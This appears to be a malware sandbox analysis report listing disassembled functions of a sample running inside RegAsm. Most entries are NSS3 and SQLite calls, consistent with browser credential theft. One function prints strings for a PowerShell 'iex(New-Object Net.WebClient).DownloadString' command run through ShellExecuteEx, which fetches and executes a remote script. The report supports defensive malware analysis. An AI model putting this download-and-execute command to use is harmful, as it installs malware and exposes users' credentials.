                                                                                                        • SECITEM_AllocItem_Util.NSS3(00000000,00000000,?,?,?,?,?,?,6C1F1444,?,00000001,?,00000000,00000000,?), ref: 6C1F0DFF
                                                                                                        • memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,6C1F1444,?,00000001,?,00000000), ref: 6C1F0E16
                                                                                                        • free.MOZGLUE(?,?,?,?,?,?,?,?,?,6C1F1444,?,00000001,?,00000000,00000000,?), ref: 6C1F0E53
                                                                                                        • PR_GetCurrentThread.NSS3(?,?,?,?,6C1F1444,?,00000001,?,00000000,00000000,?,?,6C1F1444,?,?,00000000), ref: 6C1F0E65
                                                                                                        • PR_SetError.NSS3(FFFFE089,00000000,?,?,?,?,6C1F1444,?,00000001,?,00000000,00000000,?), ref: 6C1F0E79
                                                                                                          • Part of subcall function 6C201560: TlsGetValue.KERNEL32(00000000,?,6C1D0844,?), ref: 6C20157A
                                                                                                          • Part of subcall function 6C201560: EnterCriticalSection.KERNEL32(?,?,?,6C1D0844,?), ref: 6C20158F
                                                                                                          • Part of subcall function 6C201560: PR_Unlock.NSS3(?,?,?,?,6C1D0844,?), ref: 6C2015B2
                                                                                                          • Part of subcall function 6C1CB1A0: DeleteCriticalSection.KERNEL32(5B5F5EDC,6C1D1397,00000000,?,6C1CCF93,5B5F5EC0,00000000,?,6C1D1397,?), ref: 6C1CB1CB
                                                                                                          • Part of subcall function 6C1CB1A0: free.MOZGLUE(5B5F5EC0,?,6C1CCF93,5B5F5EC0,00000000,?,6C1D1397,?), ref: 6C1CB1D2
                                                                                                          • Part of subcall function 6C1C89E0: TlsGetValue.KERNEL32(00000000,-00000008,00000000,?,?,6C1C88AE,-00000008), ref: 6C1C8A04
                                                                                                          • Part of subcall function 6C1C89E0: EnterCriticalSection.KERNEL32(?), ref: 6C1C8A15
                                                                                                          • Part of subcall function 6C1C89E0: memset.VCRUNTIME140(6C1C88AE,00000000,00000132), ref: 6C1C8A27
                                                                                                          • Part of subcall function 6C1C89E0: PR_Unlock.NSS3(?), ref: 6C1C8A35
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325871750.000000006C130000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3326846154.000000006C2CF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327036374.000000006C30E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327060794.000000006C30F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327082345.000000006C310000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327104854.000000006C315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CriticalErrorSectionValue$EnterUnlockUtilfreememcpy$AllocCurrentDeleteItem_Strdup_Threadmallocmemsetstrlen
                                                                                                        • String ID:
                                                                                                        • API String ID: 1601681851-0
                                                                                                        • Opcode ID: a295e6ab5934fbc1e2fd1a7161a22231a31089f805e8d02719e0c8f76f490050
                                                                                                        • Instruction ID: fea756391d0ade58efeb24b70a1786abb2210257369c5b5ec94f685e4ccc87eb
                                                                                                        • Opcode Fuzzy Hash: a295e6ab5934fbc1e2fd1a7161a22231a31089f805e8d02719e0c8f76f490050
                                                                                                        • Instruction Fuzzy Hash: 7251A4F6E002045FEB009F64EC81ABB37E8AF55258F550064EC199BB12FB35ED19C6A2
                                                                                                        Function 6C1A6E50 Relevance: 12.2, APIs: 8, Instructions: 189COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • sqlite3_value_text.NSS3(?,?), ref: 6C1A6ED8
                                                                                                        • sqlite3_value_text.NSS3(?,?), ref: 6C1A6EE5
                                                                                                        • memcmp.VCRUNTIME140(00000000,?,?,?,?), ref: 6C1A6FA8
                                                                                                        • sqlite3_value_text.NSS3(00000000,?), ref: 6C1A6FDB
                                                                                                        • sqlite3_result_error_nomem.NSS3(?,?,?,?,?), ref: 6C1A6FF0
                                                                                                        • sqlite3_value_blob.NSS3(?,?), ref: 6C1A7010
                                                                                                        • sqlite3_value_blob.NSS3(?,?), ref: 6C1A701D
                                                                                                        • sqlite3_value_text.NSS3(00000000,?,?,?), ref: 6C1A7052
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325871750.000000006C130000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3326846154.000000006C2CF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327036374.000000006C30E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327060794.000000006C30F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327082345.000000006C310000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327104854.000000006C315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: sqlite3_value_text$sqlite3_value_blob$memcmpsqlite3_result_error_nomem
                                                                                                        • String ID:
                                                                                                        • API String ID: 1920323672-0
                                                                                                        • Opcode ID: 53eaf43956ea73d24c4b836270b090c402e09ebdebc3462e8b33d7b5b8613d28
                                                                                                        • Instruction ID: e4743ef145ef7aa46bb6ad512005203e45c1e6886971ee25b2cd2ba307362287
                                                                                                        • Opcode Fuzzy Hash: 53eaf43956ea73d24c4b836270b090c402e09ebdebc3462e8b33d7b5b8613d28
                                                                                                        • Instruction Fuzzy Hash: 2A61E4B9E052098BDB00CFE9C9507EFB7B2AF49308F1841A5D815AB755E7359D07CBA0
                                                                                                        Function 6C218F80 Relevance: 12.2, APIs: 8, Instructions: 158memoryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • SECOID_FindOID_Util.NSS3(?,?,FFFFE005,?,6C217313), ref: 6C218FBB
                                                                                                          • Part of subcall function 6C2107B0: PL_HashTableLookupConst.NSS3(?,FFFFFFFF,?,?,6C1B8298,?,?,?,6C1AFCE5,?), ref: 6C2107BF
                                                                                                          • Part of subcall function 6C2107B0: PL_HashTableLookup.NSS3(?,?), ref: 6C2107E6
                                                                                                          • Part of subcall function 6C2107B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C21081B
                                                                                                          • Part of subcall function 6C2107B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C210825
                                                                                                        • SECOID_FindOID_Util.NSS3(?,?,?,FFFFE005,?,6C217313), ref: 6C219012
                                                                                                        • SECOID_FindOID_Util.NSS3(?,?,?,?,FFFFE005,?,6C217313), ref: 6C21903C
                                                                                                        • SECITEM_CompareItem_Util.NSS3(?,?,?,?,?,?,FFFFE005,?,6C217313), ref: 6C21909E
                                                                                                        • PORT_ArenaGrow_Util.NSS3(?,?,?,00000001,?,?,?,?,?,?,FFFFE005,?,6C217313), ref: 6C2190DB
                                                                                                        • PORT_ArenaAlloc_Util.NSS3(?,00000008,?,?,?,?,?,?,FFFFE005,?,6C217313), ref: 6C2190F1
                                                                                                          • Part of subcall function 6C2110C0: TlsGetValue.KERNEL32(?,6C1B8802,00000000,00000008,?,6C1AEF74,00000000), ref: 6C2110F3
                                                                                                          • Part of subcall function 6C2110C0: EnterCriticalSection.KERNEL32(?,?,6C1B8802,00000000,00000008,?,6C1AEF74,00000000), ref: 6C21110C
                                                                                                          • Part of subcall function 6C2110C0: PL_ArenaAllocate.NSS3(?,?,?,6C1B8802,00000000,00000008,?,6C1AEF74,00000000), ref: 6C211141
                                                                                                          • Part of subcall function 6C2110C0: PR_Unlock.NSS3(?,?,?,6C1B8802,00000000,00000008,?,6C1AEF74,00000000), ref: 6C211182
                                                                                                          • Part of subcall function 6C2110C0: TlsGetValue.KERNEL32(?,6C1B8802,00000000,00000008,?,6C1AEF74,00000000), ref: 6C21119C
                                                                                                        • PR_SetError.NSS3(FFFFE005,00000000,?,?,?,FFFFE005,?,6C217313), ref: 6C21906B
                                                                                                          • Part of subcall function 6C25C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C25C2BF
                                                                                                        • PR_SetError.NSS3(FFFFE005,00000000,?,FFFFE005,?,6C217313), ref: 6C219128
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325871750.000000006C130000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3326846154.000000006C2CF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327036374.000000006C30E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327060794.000000006C30F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327082345.000000006C310000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327104854.000000006C315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Util$Error$ArenaFindValue$HashLookupTable$Alloc_AllocateCompareConstCriticalEnterGrow_Item_SectionUnlock
                                                                                                        • String ID:
                                                                                                        • API String ID: 3590961175-0
                                                                                                        • Opcode ID: 2fc2936615f096d3f3ee8ad3ca23cfff263c484281e358dca533e153235934d8
                                                                                                        • Instruction ID: 92701ef6c89674c4b00282b80c4bae0724cac8d7e639c1e23601189c3a4af325
                                                                                                        • Opcode Fuzzy Hash: 2fc2936615f096d3f3ee8ad3ca23cfff263c484281e358dca533e153235934d8
                                                                                                        • Instruction Fuzzy Hash: 3951A571A0820A8FEB10EF69DC44B16B3F5AF44369F154029EE15D7F51EB32E864CB91
                                                                                                        Function 6C1F88E0 Relevance: 12.1, APIs: 8, Instructions: 112COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C1F88FC
                                                                                                          • Part of subcall function 6C20BE30: SECOID_FindOID_Util.NSS3(6C1C311B,00000000,?,6C1C311B,?), ref: 6C20BE44
                                                                                                        • PORT_NewArena_Util.NSS3(00000800), ref: 6C1F8913
                                                                                                          • Part of subcall function 6C210FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C1B87ED,00000800,6C1AEF74,00000000), ref: 6C211000
                                                                                                          • Part of subcall function 6C210FF0: PR_NewLock.NSS3(?,00000800,6C1AEF74,00000000), ref: 6C211016
                                                                                                          • Part of subcall function 6C210FF0: PL_InitArenaPool.NSS3(00000000,security,6C1B87ED,00000008,?,00000800,6C1AEF74,00000000), ref: 6C21102B
                                                                                                        • SEC_ASN1DecodeItem_Util.NSS3(00000000,?,6C2DD864,?), ref: 6C1F8947
                                                                                                          • Part of subcall function 6C20E200: PR_SetError.NSS3(FFFFE009,00000000), ref: 6C20E245
                                                                                                          • Part of subcall function 6C20E200: PORT_FreeArena_Util.NSS3(00000000,00000001), ref: 6C20E254
                                                                                                        • SECOID_GetAlgorithmTag_Util.NSS3(00000000), ref: 6C1F895B
                                                                                                        • DER_GetInteger_Util.NSS3(?), ref: 6C1F8973
                                                                                                        • PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C1F8982
                                                                                                        • SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6C1F89EC
                                                                                                        • PR_SetError.NSS3(FFFFE006,00000000), ref: 6C1F8A12
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325871750.000000006C130000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3326846154.000000006C2CF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327036374.000000006C30E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327060794.000000006C30F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327082345.000000006C310000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327104854.000000006C315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Util$Arena_Tag_$AlgorithmErrorFindFree$ArenaDecodeInitInteger_Item_LockPoolcalloc
                                                                                                        • String ID:
                                                                                                        • API String ID: 2145430656-0
                                                                                                        • Opcode ID: cdee0ed69e2dd5b0cf3731968987f7fd7b2fa15deda53f17f04a806700602a45
                                                                                                        • Instruction ID: 2971e7a5bfcc045083760c93a1f84f61f4f5995b967964ff1fe04ead8cd97fc8
                                                                                                        • Opcode Fuzzy Hash: cdee0ed69e2dd5b0cf3731968987f7fd7b2fa15deda53f17f04a806700602a45
                                                                                                        • Instruction Fuzzy Hash: F43108A2B0860457F720562AAC417AA36D5ABE231CF250637D939D7B81FB35C4578193
                                                                                                        Function 6C1D4E50 Relevance: 12.1, APIs: 8, Instructions: 97COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • TlsGetValue.KERNEL32 ref: 6C1D4E90
                                                                                                        • EnterCriticalSection.KERNEL32 ref: 6C1D4EA9
                                                                                                        • TlsGetValue.KERNEL32 ref: 6C1D4EC6
                                                                                                        • EnterCriticalSection.KERNEL32 ref: 6C1D4EDF
                                                                                                        • PL_HashTableLookup.NSS3 ref: 6C1D4EF8
                                                                                                        • PR_Unlock.NSS3 ref: 6C1D4F05
                                                                                                        • PR_Now.NSS3 ref: 6C1D4F13
                                                                                                        • PR_Unlock.NSS3 ref: 6C1D4F3A
                                                                                                          • Part of subcall function 6C1A07A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C13204A), ref: 6C1A07AD
                                                                                                          • Part of subcall function 6C1A07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C13204A), ref: 6C1A07CD
                                                                                                          • Part of subcall function 6C1A07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C13204A), ref: 6C1A07D6
                                                                                                          • Part of subcall function 6C1A07A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C13204A), ref: 6C1A07E4
                                                                                                          • Part of subcall function 6C1A07A0: TlsSetValue.KERNEL32(00000000,?,6C13204A), ref: 6C1A0864
                                                                                                          • Part of subcall function 6C1A07A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C1A0880
                                                                                                          • Part of subcall function 6C1A07A0: TlsSetValue.KERNEL32(00000000,?,?,6C13204A), ref: 6C1A08CB
                                                                                                          • Part of subcall function 6C1A07A0: TlsGetValue.KERNEL32(?,?,6C13204A), ref: 6C1A08D7
                                                                                                          • Part of subcall function 6C1A07A0: TlsGetValue.KERNEL32(?,?,6C13204A), ref: 6C1A08FB
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325871750.000000006C130000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3326846154.000000006C2CF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327036374.000000006C30E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327060794.000000006C30F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327082345.000000006C310000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327104854.000000006C315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Value$CriticalEnterSectionUnlockcalloc$HashLookupTable
                                                                                                        • String ID:
                                                                                                        • API String ID: 326028414-0
                                                                                                        • Opcode ID: b5e0a566d97b5500f7a1a9e68b632a10f12168b0e822bc673d710aa58bda7996
                                                                                                        • Instruction ID: 389863e6730393b1bea8a8349adb4fdccc4e5f2183e7195fdf0d31de63dd623a
                                                                                                        • Opcode Fuzzy Hash: b5e0a566d97b5500f7a1a9e68b632a10f12168b0e822bc673d710aa58bda7996
                                                                                                        • Instruction Fuzzy Hash: C6413DB5A006099FCB00EF7CD0849AAFBF4FF49314B068569DC999B711EB30E895CB91
                                                                                                        Function 6C2C0860 Relevance: 12.1, APIs: 8, Instructions: 61COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • PR_LogFlush.NSS3(00000000,00000000,?,?,6C2C7AE2,?,?,?,?,?,?,6C2C798A), ref: 6C2C086C
                                                                                                          • Part of subcall function 6C2C0930: EnterCriticalSection.KERNEL32(?,00000000,?,6C2C0C83), ref: 6C2C094F
                                                                                                          • Part of subcall function 6C2C0930: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,?,?,?,6C2C0C83), ref: 6C2C0974
                                                                                                          • Part of subcall function 6C2C0930: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C2C0983
                                                                                                          • Part of subcall function 6C2C0930: _PR_MD_UNLOCK.NSS3(?,?,6C2C0C83), ref: 6C2C099F
                                                                                                        • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000001,00000000,00000000,?,?,6C2C7AE2,?,?,?,?,?,?,6C2C798A), ref: 6C2C087D
                                                                                                        • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,6C2C7AE2,?,?,?,?,?,?,6C2C798A), ref: 6C2C0892
                                                                                                        • fclose.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?,?,?,?,6C2C798A), ref: 6C2C08AA
                                                                                                        • free.MOZGLUE(?,00000000,00000000,?,?,6C2C7AE2,?,?,?,?,?,?,6C2C798A), ref: 6C2C08C7
                                                                                                        • free.MOZGLUE(?,00000000,00000000,?,?,6C2C7AE2,?,?,?,?,?,?,6C2C798A), ref: 6C2C08E9
                                                                                                        • free.MOZGLUE(?,6C2C7AE2,?,?,?,?,?,?,6C2C798A), ref: 6C2C08EF
                                                                                                        • PR_DestroyLock.NSS3(?,00000000,00000000,?,?,6C2C7AE2,?,?,?,?,?,?,6C2C798A), ref: 6C2C090E
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325871750.000000006C130000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3326846154.000000006C2CF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327036374.000000006C30E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327060794.000000006C30F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327082345.000000006C310000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327104854.000000006C315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: free$__acrt_iob_func$CriticalDestroyEnterFlushLockSectionfclosefflushfwrite
                                                                                                        • String ID:
                                                                                                        • API String ID: 3145526462-0
                                                                                                        • Opcode ID: c944aac9f31f8396919fc9a166b3e16226c49660cd834d9d74d854cb9c61269c
                                                                                                        • Instruction ID: c769f26dcf81cee76cac70be00b1c49e7e15e75b00e0db38b7dd24cd18a494d1
                                                                                                        • Opcode Fuzzy Hash: c944aac9f31f8396919fc9a166b3e16226c49660cd834d9d74d854cb9c61269c
                                                                                                        • Instruction Fuzzy Hash: E21190F2B022454FEF00AB58DC86786377CAB52659F180325FD1A87A40DB76E814CBE3
                                                                                                        Function 6C134F60 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 211stringCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C134FC4
                                                                                                        • sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,0002996C,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C1351BB
                                                                                                        Strings
                                                                                                        • misuse, xrefs: 6C1351AF
                                                                                                        • unable to delete/modify user-function due to active statements, xrefs: 6C1351DF
                                                                                                        • %s at line %d of [%.10s], xrefs: 6C1351B4
                                                                                                        • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C1351A5
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325871750.000000006C130000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3326846154.000000006C2CF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327036374.000000006C30E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327060794.000000006C30F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327082345.000000006C310000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327104854.000000006C315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: sqlite3_logstrlen
                                                                                                        • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$misuse$unable to delete/modify user-function due to active statements
                                                                                                        • API String ID: 3619038524-4115156624
                                                                                                        • Opcode ID: e2739a92228bc80fcc0251c7dbc823b90363854a3eeba3a125aa06362193b9e9
                                                                                                        • Instruction ID: 2efaa76b1954100424176dc0c117716db2a8e7ef1d2ee1dd76f00368c74c0c54
                                                                                                        • Opcode Fuzzy Hash: e2739a92228bc80fcc0251c7dbc823b90363854a3eeba3a125aa06362193b9e9
                                                                                                        • Instruction Fuzzy Hash: CC71CEB16042199FEB00CE29CC80B9A77F9BF5970CF095524FD1D9BA95D33AE850CBA1
                                                                                                        Function 00412D70 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 121COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                          • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                          • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                          • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                          • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                          • Part of subcall function 00411C4A: GetSystemTime.KERNEL32(?,00436701,?), ref: 00411C79
                                                                                                          • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                          • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                        • ShellExecuteEx.SHELL32(?), ref: 00412EC0
                                                                                                        Strings
                                                                                                        • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00412E18
                                                                                                        • ')", xrefs: 00412E13
                                                                                                        • C:\ProgramData\, xrefs: 00412DA3
                                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00412E5B
                                                                                                        • .ps1, xrefs: 00412DF3
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: lstrcpy$lstrcat$ExecuteShellSystemTimelstrlen
                                                                                                        • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$.ps1$C:\ProgramData\$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        • API String ID: 2215929589-1989157005
                                                                                                        • Opcode ID: a3660bf6eb38366a5fc88e1f2295be1a68adea8c2c4e3bb7b595f6666764ac78
                                                                                                        • Instruction ID: d4bc49303887be4e6334ac6b4843b1e71d055e880c24203978c9a7e3e1ca0007
                                                                                                        • Opcode Fuzzy Hash: a3660bf6eb38366a5fc88e1f2295be1a68adea8c2c4e3bb7b595f6666764ac78
                                                                                                        • Instruction Fuzzy Hash: 4641FB71E00119ABCF11FBA6DD469CDB7B4AF04308F61406BF514B7191DBB86E8A8B98
                                                                                                        Function 6C1FAC10 Relevance: 10.6, APIs: 7, Instructions: 121memoryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • PK11_CreateContextBySymKey.NSS3(00000133,00000105,00000000,?,?,6C1FAB3E,?,?,?), ref: 6C1FAC35
                                                                                                          • Part of subcall function 6C1DCEC0: PK11_FreeSymKey.NSS3(00000000), ref: 6C1DCF16
                                                                                                        • PORT_ArenaAlloc_Util.NSS3(?,?,?,?,?,?,?,6C1FAB3E,?,?,?), ref: 6C1FAC55
                                                                                                          • Part of subcall function 6C2110C0: TlsGetValue.KERNEL32(?,6C1B8802,00000000,00000008,?,6C1AEF74,00000000), ref: 6C2110F3
                                                                                                          • Part of subcall function 6C2110C0: EnterCriticalSection.KERNEL32(?,?,6C1B8802,00000000,00000008,?,6C1AEF74,00000000), ref: 6C21110C
                                                                                                          • Part of subcall function 6C2110C0: PL_ArenaAllocate.NSS3(?,?,?,6C1B8802,00000000,00000008,?,6C1AEF74,00000000), ref: 6C211141
                                                                                                          • Part of subcall function 6C2110C0: PR_Unlock.NSS3(?,?,?,6C1B8802,00000000,00000008,?,6C1AEF74,00000000), ref: 6C211182
                                                                                                          • Part of subcall function 6C2110C0: TlsGetValue.KERNEL32(?,6C1B8802,00000000,00000008,?,6C1AEF74,00000000), ref: 6C21119C
                                                                                                        • PK11_CipherOp.NSS3(?,00000000,?,?,?,?,?,?,?,?,?,?,?,6C1FAB3E,?,?), ref: 6C1FAC70
                                                                                                          • Part of subcall function 6C1DE300: TlsGetValue.KERNEL32 ref: 6C1DE33C
                                                                                                          • Part of subcall function 6C1DE300: EnterCriticalSection.KERNEL32(?), ref: 6C1DE350
